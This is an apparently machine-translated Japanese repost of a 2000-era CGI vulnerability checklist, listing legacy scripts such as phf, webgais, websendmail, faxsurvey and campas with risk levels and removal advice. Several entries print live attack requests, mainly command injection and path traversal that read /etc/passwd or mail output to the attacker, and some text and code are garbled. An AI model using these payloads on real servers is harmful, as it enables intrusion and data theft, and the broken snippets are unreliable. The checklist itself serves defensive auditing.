CGI セキュリティ脆弱性情報クイックチェック v1.0 (ターン 1)

WBOY
リリース: 2016-06-21 09:12:30
オリジナル
1062 人が閲覧しました

cgi|セキュリティ|セキュリティの脆弱性

◆ CGI セキュリティ脆弱性情報クイックチェック v1.0

Date: 2000-8-15

############################ # ###########################################
この記事は以下から引用しましたこれは貴重なものではありません。注意して集めれば、これよりも包括的で優れた情報が得られると思いますが、私はこれらの情報を入手することを望んでいません。しかし、私は完全な自由、完全な公開性、完全な共有を主張する小さな人間なので、その友人が彼を責めないことを願っています:)
# 任意のセキュリティ組織または個人が喜んでいます。この記事の長期的かつ継続的なメンテナンス、更新、変更を行うつもりはありませんので、私と相談することなく、ご自由に行ってください。ただし、その結果はインターネットに完全に公開される必要があります。 . プライベートな行為は歓迎されません
ようこそ
# ただし、この記事の転載は歓迎です。
# ご質問やご提案がございましたら、iwillsurewin@163.net までメールしてください。
# iwillsurewin 2000.7.28
###################### # #############################################
1 実行任意のコマンド:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
提案:
解決策: Apache Web サーバーを 1.1.1 以降にアップグレードするか、アップグレードします。 NCSA Web サーバーを最新バージョンに更新します

_______________________________________________________________

2
タイプ: 攻撃タイプ
名前: wguset.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、および wguest を使用している場合。 Web 実行可能ディレクトリに存在すると、侵入者はそれを使用して、ハードディスク上のユーザーが読み取り可能なすべてのファイルを読み取ることができます
推奨: wguset.exe を Web ディレクトリから移動または削除します
解決策: wguset を移動または削除しますWeb ディレクトリから .exe を実行します

_______________________________________________________________


3
タイプ: 攻撃タイプ
名前: rguset.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、および最適な場合。 exe が Web 実行可能ディレクトリに存在すると、侵入者はそれを使用して、USR_ ユーザーが読み取ることができるハード ディスク上のすべてのファイルを読み取ることができます。 推奨事項: rguset.exe を Web ディレクトリから移動または削除します。
解決策: Web ディレクトリから rguset.exe を移動または削除します


__________________________________________________________

4
タイプ: 攻撃
名前: perl.exe
リスクレベル: 低
説明: Perl.exe は cgi-bin 実行ディレクトリに存在します。これは重大な構成エラーです。ハッカーは、perl.exe の後に一連の命令を追加し、ブラウザを使用してサーバー上の任意のスクリプト プログラムを実行する可能性があります
提案: perl.exe を実行権限のある Web ディレクトリに配置するのは危険です
解決策: Web 上で perl を削除します


______________________________________________________________


5
タイプ: 攻撃タイプ
名前: shtml.exe
リスクレベル: 低
説明: フロントページを Web サーバーとして使用している場合、侵入者は IUSR_< を使用する可能性があります。 hostname> user と shtml.exe を使用してマシンに侵入し、望ましくないことを実行します。
推奨事項: Web ディレクトリから shtml.exe を削除します。移動または削除されました


__________________________________________________________________


6
タイプ: 攻撃タイプ
名前: wwwboard.pl
リスクレベル: 低
説明: wwwboard.pl プログラムは、攻撃者にサーバー上で D.O.S 攻撃を簡単に実行させる可能性があります
推奨事項:必要に応じてファイルを削除します
解決策: get_variables のサブルーチン内の次の段落:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/ ,$FORM{ 'フォローアップ'});
$num_followups = @followups = @followup_num;
$last_message = Pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$ FORM{'origname '}";
$origsubject = "$FORM{'origsubject'}"; }
次のように置き換えられました:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/ ,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = Pop(@followups);
$origdate = "$FORM{'origdate'}"; "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# 作成者: Samuel Sparling sparling@ Slip.net)
$fn= 0;
while ($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# WWWBoard を終了します爆弾パッチ
}

関連リンク: http://hgfr

_______________________________________________________________

7
タイプ: 攻撃タイプ
名前: Uploader.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、侵入者は、uploader.exe を使用して任意のファイルをアップロードすることができます
提案: Uploader.exe を Web ディレクトリから移動または削除します
解決策: Uploader.exe を Web ディレクトリから移動または削除します

_______________________________________________________________

8
タイプ: 攻撃タイプ
名前: bdir.htr
リスク レベル: 高
説明: Web サーバーのオペレーティング システムとして NT を使用し、Web 実行可能ディレクトリに bdir.htr が存在する場合、侵入者はこれを使用して、Web サーバー上に ODBC データベースを際限なく作成できます。サーバーにアクセスし、いくつかの実行可能ファイルを生成します。
提案: Web ディレクトリから bdir.htr を移動または削除します。
解決策: Web ディレクトリから bdir.htr を移動または削除します。

_____________________________________________________________________

9
タイプ: 攻撃
名前: Count.cgi
リスク レベル: 高
説明: /cgi-bin ディレクトリ内の Count.cgi プログラム (wwwcount2.3 バージョン) にはオーバーフロー エラーがあり、侵入者がログインせずにリモートから任意の命令を実行できるようになります。
推奨事項: 必要に応じてこのファイルを削除します。
解決策: wwwcount を 2.4 にアップグレードするか、上記

_____________________________________________________________________________________

10
タイプ: 攻撃タイプ
名前: test-cgi
リスクレベル: 高
説明: ファイル test-cgi は、侵入者がサーバー上の重要な情報を閲覧するために使用される可能性があります

推奨事項: 推奨されますcgi-bin ディレクトリ内の実行プログラムを確認し、アクセス許可を厳密に制御します
解決策: test-cgi ファイルを削除します

_____________________________________________________________________

11
タイプ: 攻撃タイプ
名前: nph-test -cgi
リスクレベル: 高
説明: ファイル nph-test-cgi は、侵入者がサーバー上の重要な情報を閲覧するために使用する可能性があります

推奨事項: cgi-bin ディレクトリ内の実行プログラムを確認し、アクセス許可を厳密に制御することをお勧めします
解決方法: ファイルを削除しますnph-test-cgi ファイル

_______________________________________________________________

12
タイプ: 攻撃
名前: php.cgi
リスクレベル: 低
説明: php.cgi プログラムにはバッファ オーバーフローの脆弱性を含む多くの脆弱性があり、あらゆるシステム ファイルが侵入者に読み取られる原因になります
推奨事項: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします。名前: ハンドラー
リスクレベル: 低
説明: IRIX 5.3、6.2、6.3、6.4 の /cgi-bin/handler プログラムにバッファ オーバーフロー エラーがあり、侵入者がサーバー上のプログラムをリモートで実行する可能性があります:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決策: ハンドラー ファイルを削除します

_______________________________________________________________


14
タイプ: 攻撃タイプ
名前: webgais
リスクレベル: 高
説明: /cgi-bin、ディレクトリ内の webgais は GAIS 検索ツールのインターフェイスであり、この不具合により、侵入者はプログラムのセキュリティ メカニズムをバイパスし、システム コマンドを実行できます:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (これを「exploit」行の実際の長さに置き換えます)
telnet target .machine.com 80

query=';mail+you@your.host提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決方法: webgais ファイルを削除します

_______________________________________________________________

15
タイプ: 攻撃タイプ
名前: websendmail
リスクレベル: 高
説明: /cgin-bin ディレクトリ内の websendmail プログラムにより、侵入者はシステム コマンドを実行できます:

telnet ターゲット。machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (サーバーに渡される文字列の実際の長さに置き換える必要があります。この場合は xxx=90)
receiver =;mail+ your_address@somewhere.org&content=a
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: 上級ユーザー: websendmail スクリプト、特殊文字のフィルター
一般ユーザー: websendmail ファイルの削除

___________________________________________________________________________

16
タイプ: 攻撃
名前: webdist.cgi
リスクレベル: 高
説明: Irix6.2 および 6.3 プラットフォームの場合、/cgi-bin ディレクトリの webdist.cgi には脆弱性があり、侵入者がログインせずにシステム上の任意の命令を実行できるようになります:
http://host/cgi-bin/webdist。 cgi ?distloc=;cat%20/etc/passwd

提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします。 解決策: /var/www/cgi-bin/webdist.cgi ディレクトリの webdist を削除します。 .cgi

________________________________________________________________________

17
タイプ: 攻撃
名前: FAXsurvey
リスクレベル: 高
説明: Linux S.u.S.E の /cgi-bin ディレクトリにある FAXsurvey プログラムにより、侵入者はログインせずにサーバー上でコマンドを実行できます:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: /cgi-bin/faxsurvey file


_______________________________________________________________


18
タイプ: 攻撃タイプ
名前: htmlscript
リスクレベル: 中
説明: htmlscript2.99x 以前のバージョンがインストールされているサーバー、侵入を可能にするバグがありますサーバー上の任意のファイルを表示できます:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
推奨事項: 確認することをお勧めします。不要なプログラムを避けるために cgi-bin ディレクトリを削除します。 解決策: /cgi-bin/htmlscript スクリプト ファイルを削除するか、htmlscript を 3.0 以降にアップグレードします。 リスク レベル: 中
説明: Irix6.4 以前の Web サーバーでは、/cgi- bin/pfdisplay プログラムにより、侵入者がサーバー上のファイルを不正に閲覧できるようになります
推奨事項: 不必要なプログラムを回避するために、cgi-bin ディレクトリを監査することをお勧めします。プログラムは存在します
解決策: /cgi-bin/pfdisplay ファイルを削除するか、パッチを適用します
パッチは、sgigate.sgi.com (204.94.209.1) または ftp.sgi.com からダウンロードできます:
ファイル名: README.patch.3018
アルゴリズム #1 (sum -r): 37955 11 README.patch.3018
アルゴリズム#2 (合計): 15455 11 README.patch.3018
MD5 チェックサム: 1169EB51D75E0794C64C2C1FD6211B69

ファイル名: patchSG00030 18
アルゴリズム #1 (sum -r) : 01679 patchSG000301 8
アルゴリズム #2 (合計): 12876 2 patchSG0003018
MD5チェックサム: BD16A53A0AE693D6E9E276EE066BDBC8

ファイル名: patchSG0003018.idb
アルゴリズム #1 (合計 - r): 01339 2 patchSG0003018.idb
アルゴリズム #2 (合計): 251 2 patchSG00030 18.idb
MD5チェックサム: 1CB16E6A8C50BF17CD02A29C2E4D35EB

ファイル名: patchSG0003018.performer_tools_man
アルゴリズム #1 (合計 -r): 10201 8 patchSG0003018.performer _tools_man
アルゴリズム #2 (合計): 3144 8 patchSG0003018.performer_tools_man
MD5 チェックサム: B6B3D90FAB9B5A342397C3E5AF5A8 D29

ファイル名: patchSG0003018.performer_tools_sw
アルゴリズム #1 (sum -r) : 48474 18 patchSG0003018.performer_tools_sw
アルゴリズム #2 (合計): 28176 18 patchSG0003018.performer_tools_sw
MD 5 チェックサム: DF4E8ED8326A6A0B39F7B4D67E5FD71F
関連リンク: http:// www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
タイプ: 攻撃
名前: www-sql
リスクレベル: 中
説明: www-sql は /cgi-bin/ ディレクトリに存在し、保護されたファイルへの侵入と不正アクセスにつながります
提案: www-sql ファイルを削除するのが最善です
解決策: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS")
if(!s); {
puts("Content-type: text/plainrnrnPHP/FI が内部エラーを検出しました。実行した内容を sa@hogia.net に通知してください。n") ;
exit(1);
}
s = getenv(" PATH_TRANSLATED");
関連接続:

_______________________________________________________________


21
タイプ: 攻撃タイプ
名前: view-source
リスクレベル: 高
説明: cgi-bin ディレクトリ内の view-source プログラムはセキュリティを実行しません入力をチェックし、侵入者がサーバー上のあらゆるファイルを閲覧できるようにします。 推奨事項: 不要なプログラムを回避するために、cgi-bin ディレクトリを監査することをお勧めします。 解決策: cgi-bin ディレクトリ内のプログラムを削除または表示します
関連リンク: http: //www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

____________________________________________________________________________

22
タイプ: 攻撃タイプ
名前: Campas
リスクレベル: 高
説明: Campas プログラムにバグがありますcgi-bin ディレクトリ内: 侵入者がサーバー上の重要なファイルを自由に閲覧できるようにする:
telnet www.xxxx.net 80
200.xx.xx.xx を試行中...
venus.xxxx.net に接続
エスケープ文字'^]' です。
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
推奨事項:プログラムが存在する不要なエラーを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決策:cgi-bin ディレクトリを削除します/cgi-bin ディレクトリ内のプログラム
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_______________________________________________________________


23
タイプ: 攻撃タイプ
名前: aglimpse
リスクレベル: 高
説明: でcgi-bin ディレクトリの aglimpse プログラムにはバグがあり、侵入者がログインせずに任意の命令を実行できるようになります。 推奨事項: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします。 解決策: /cgi を削除します。 -bin ディレクトリ。aglimpse プログラム
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________________

24
タイプ: 攻撃タイプ
名前: AT-admin。 cgi
リスクレベル: 中
説明: Excite for Web Servers 1.1 の /cgi-bin/AT-admin.cgi プログラムにより、一般ユーザーがシステム全体を完全に制御できるようになります
推奨事項: cgi-bin ディレクトリを確認して、不要なプログラムを回避します。
解決策: /cgi-bin ディレクトリ内の AT-admin.cgi プログラムを削除します。
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


__________________________________________________________________________

25
タイプ: 攻撃タイプ
名前: フィンガー
リスクレベル: 中
説明: /cgi-bin にあるこのフィンガー プログラムは他のサーバーの情報を表示できますが、パラメータがローカル マシンに変更されると、ローカル マシン上のアカウント情報が公開されます:
/cgi-bin/finger?@localhost
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: /cgi-bin 内の Finger プログラムを削除しますディレクトリ
関連リンク:


_____________________________________________________________________________




関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のおすすめ
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート